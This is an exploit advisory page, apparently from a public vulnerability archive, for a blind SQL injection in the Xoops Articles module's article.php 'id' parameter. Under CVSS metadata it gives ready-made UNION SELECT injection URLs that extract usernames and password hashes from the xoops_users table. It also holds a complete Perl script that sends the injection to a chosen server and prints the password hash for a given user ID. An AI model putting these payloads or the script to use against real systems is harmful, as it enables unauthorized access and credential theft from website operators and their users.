Xoops All Version -Articles- Article.PHP (ID) Blind SQL Injection ExpL0it

2008.05.07
Credit: Cr@zy_King
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

/Cr@zy_King / http://coderx.org Xoops All Version -Articles- Article.PHP (ID) Blind SQL Injection ExpL0it Sql 1-2 article.php?id=3+union+select+1,2,3,4,5,6,AES_DECRYPT(AES_ENCRYPT(USER() ,0x71),0x71),8,9,0,1,2,3,4,5,6,7,8,9,0/* article.php?id=3/**/UNION/**/SELECT/**/NULL,NULL,NULL,NULL,uid,uname,pas s,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL/**/FR OM/**/xoops_users/**/LIMIT/**/1,1/* # Exploit : ############################################# #Coded By Cr@zy_King http://coderx.org]# ############################################# use IO::Socket; if (@ARGV != 3) { print "\n-----------------------------------\n"; print "Xoops All Version -Articles- Article.PHP (ID) Blind SQL Injection ExpL0it\n"; print "-----------------------------------\n"; print "\n4ever Cra\n"; print "crazy_kinq[at]hotmail.co.uk\n"; print "http://coderx.org\n"; print "\n-----------------------------------\n"; print "\nKullanim: $0 <server> <path> <uid>\n"; print "Ornek: $0 www.victim.com /path 1\n"; print "\n-----------------------------------\n"; exit (); } $server = $ARGV[0]; $path = $ARGV[1]; $uid = $ARGV[2]; $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80"); printf $socket ("GET %s/modules/articles/article.php?id=3/**/UNION/**/SELECT/**/NULL,NULL,NUL L,NULL,NULL,pass,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL, NULL,NULL,NULL/**/FROM/**/xoops_users/**/WHERE/**/uid=$uid/* HTTP/1.0\nHost: %s\nAccept: */*\nConnection: close\n\n", $path,$server,$uid); while(<$socket>) { if (/\>(\w{32})\</) { print "\nID '$uid' User Password :\n\n$1\n"; } } # Cr@zy_King # http://coderx.org # crazy_kinq (at) hotmail.co (dot) uk [email concealed]


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top